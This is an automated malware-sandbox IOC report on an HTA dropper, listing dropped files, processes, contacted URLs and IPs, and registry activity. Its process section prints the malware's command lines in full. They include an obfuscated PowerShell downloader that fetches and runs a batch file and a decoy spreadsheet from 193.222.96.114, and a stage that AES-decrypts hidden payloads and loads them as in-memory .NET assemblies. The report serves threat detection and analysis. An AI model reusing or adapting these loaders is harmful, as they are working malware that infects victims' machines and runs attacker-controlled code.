IOC Report
hta.hta

loading gif

Files

File Path
Type
Category
Malicious
hta.hta
HTML document, ASCII text, with very long lines (12144), with CRLF line terminators
initial sample
 malicious
C:\Users\user\AppData\Roaming\GoGi.bat
DOS batch file, ASCII text, with very long lines (51202), with CRLF line terminators
dropped
 malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x689d4e29, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05blmdqe.4yh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ql2421xb.nmu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vp24bue4.0ff.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whkbyoyv.adm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y12wcujt.vlr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2sjeiom.gwy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\jiteon.xlsx
Microsoft Excel 2007+
dropped
C:\Users\user\AppData\Roaming\~$jiteon.xlsx
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
\Device\ConDrv
ASCII text, with very long lines (2145), with CRLF line terminators
dropped
There are 8 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\hta.hta"
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "
 malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
 malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://193.222.
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://193.222.96.114:7287/GoGi.
unknown
http://crl.ver)
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
http://193.222.96.114:72
unknown
http://193.222.96.
unknown
https://aka.ms/pscore6LR
unknown
https://github.com/Pester/Pester
unknown
http://193.222.96.114:7287/jiteon.xlsx
193.222.96.114
http://193.222.96.114
unknown
http://193.222.96.114:728
unknown
http://193.222.96.114:7287/GoGi.ba
unknown
https://g.live.com/odclientsettings/Prod.C:
unknown
http://193.222.96.114:7287/GoGi.bat
193.222.96.114
http://193.222.9
unknown
http://193.22
unknown
http://193.222.96.114:7287/Go
unknown
https://g.live.com/odclientsettings/ProdV2
unknown
http://193.222.96.114:7287/G
unknown
http://193.222.96.114:7287/GoGi
unknown
http://193.222.96
unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
unknown
http://193.222.96.1
unknown
http://193.222.96.114:7287
unknown
https://aka.ms/pscore6lB
unknown
http://193.222.96.114:
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://193.222.96.114:7287/GoGi.b
unknown
http://193.2
unknown
http://193.222
unknown
http://193.222.96.114:7287/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://193.222.96.114:7
unknown
http://193.222.96.11
unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
unknown
http://193.222.96.114:7287/GoG
unknown
There are 32 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.214.172
part-0013.t-0009.t-msedge.net
13.107.246.41

IPs

IP
Domain
Country
Malicious
13.107.246.41
part-0013.t-0009.t-msedge.net
United States
193.222.96.114
unknown
Germany
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\7500
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\16
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML
KnownIDs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor
Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\DefaultIcon
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\ShellEx\IconHandler
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile\DefaultIcon
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML
KnownIDs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor
Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\DefaultIcon
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\ShellEx\IconHandler
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile\DefaultIcon
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell\edit
NULL
